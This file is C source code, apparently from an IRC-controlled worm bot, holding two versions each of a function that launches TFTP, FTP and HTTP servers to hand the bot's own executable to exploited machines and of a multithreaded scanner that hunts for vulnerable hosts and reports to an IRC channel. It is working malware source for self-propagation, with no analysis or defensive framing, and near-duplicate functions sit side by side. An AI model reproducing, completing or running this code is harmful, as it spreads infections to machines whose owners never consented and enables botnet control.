void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); #endif #ifndef NO_FTPD // static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif } } else if (exploit[scan.exploit].http) { if (findthreadid(HTTP_THREAD) == 0) { static HTTPD httpd; char *c; GetModuleFileName(0,httpd.dir,sizeof(httpd.dir)); if ((c=strrchr(httpd.dir,'\\')) != NULL) *c='\0'; httpd.port = httpport; httpd.enabled = FALSE; sprintf(httpd.chan, scan.chan); httpd.sock = scan.sock; httpd.notice = scan.notice; httpd.silent = scan.silent; sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir); httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL); if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) { while(httpd.info == FALSE) Sleep(50); } else sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); } } } return; }
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "tftp -- Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "tftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); #endif #ifndef NO_FTPD // static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "ftp -- Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "ftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif } } } return; }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { sprintf(buffer,"Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE], szSelfExe[MAX_PATH]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); /* // FIX ME: Make this a standalone function if (!FileExists(szLocalPayloadFile)) { GetModuleFileName(0,szSelfExe,MAX_PATH); CopyFile(szSelfExe,szLocalPayloadFile,FALSE); // FIX ME: Make this copy to the same directory (could affect other stuff) } */ CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { // failed to initialize CriticalSection sprintf(buffer,"[scan]: Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; threads[scan.cthreadnum].port = scan.port; threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0); Sleep(50); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }